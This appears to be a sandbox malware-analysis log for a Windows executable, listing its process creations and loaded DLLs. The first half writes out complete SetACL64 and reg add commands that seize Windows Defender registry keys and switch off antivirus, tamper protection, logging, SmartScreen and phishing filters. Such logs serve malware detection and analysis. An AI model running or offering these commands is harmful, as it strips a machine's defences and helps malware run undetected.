Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: dfscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Section loaded: srvcli.dll	Jump to behavior
